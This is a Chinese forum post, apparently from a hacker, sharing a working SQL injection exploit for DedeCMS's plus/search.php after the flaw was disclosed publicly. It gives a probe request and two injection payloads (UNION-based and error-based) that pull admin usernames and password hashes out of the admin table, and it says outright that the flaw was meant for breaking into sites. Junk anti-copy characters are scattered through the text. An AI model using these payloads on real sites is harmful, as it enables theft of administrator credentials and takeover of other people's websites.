转载不加作者名的没JJ$ z- q' q8 d. n, t
: j S/ }# Y! B) w! [! ]0 b( |) v
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
5 B* L- J; h) C! U2 q$ s
$ A7 ~9 [( z! d! q( p6 b既然已经发出来了,我就把我自己搞的exp发下吧。。唉。: M# l {% t$ ]* e
d( l" G s9 b; ~0 n+ O' f7 M
我一般是这样测试的:. K; L; p& D" v# J
0 h1 s: s$ p/ A8 L; d* t& C$ _3 E提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
& |2 f$ q8 t: T6 ~1 I
, J# p9 m4 {" U; B' D转载不加作者名的没JJ
! q+ ?0 L% C p ~ N! \6 ~; |
. z; ]7 k, m8 u4 T作者:鬼哥5 j. b0 ^8 V5 c( k
2 F! J# Z9 r2 c" V* u" e5 G# u& Z1 n
& [& |; v/ M* [' r. X9 |% t
) t! j2 B2 {% X4 F# T; T4 c% _& K6 k看结果如果提示
2 R! A; ]4 G, M: O8 f0 ]. W
" N2 q+ t+ T( z2 ]2 P- qSafe Alert: Request Error step 2 !8 A- w! o! Y- L. M8 Q
2 f, @8 m* f l6 y: i) a; A那么直接用下面的exp
8 p# N% Q1 j6 ^. r* A
+ K/ N- P7 ?/ {4 pxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a0 a0 m# g" M' }3 a: _4 }
" U r5 A7 E' v8 |: k
& c, j2 F2 d" C9 P看结果如果提示
: \1 A8 A6 j' g0 K7 g/ @
% T' u1 \: I+ A' tSafe Alert: Request Error step 1 !
; l+ _2 P1 b# e- A' F B! T; o. u3 n5 v7 c- \0 z6 t* I9 V, x
那么直接用下面的exp
# [& j- u' D+ G2 O- o! P6 V/ g* A- p
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ r' O0 {) _ A9 \" q4 R
' K$ G2 ~/ r) U% }+ Q9 z7 g5 `, w$ ?
5 ^1 t! r0 X( P% ]0 ]9 {3 h如果正常显示证明漏洞不存在了。1 k4 L: ^$ R2 h7 G) Q) Y2 e3 m
" [! K) A$ _3 k! s6 g
转载不加作者名的没JJ |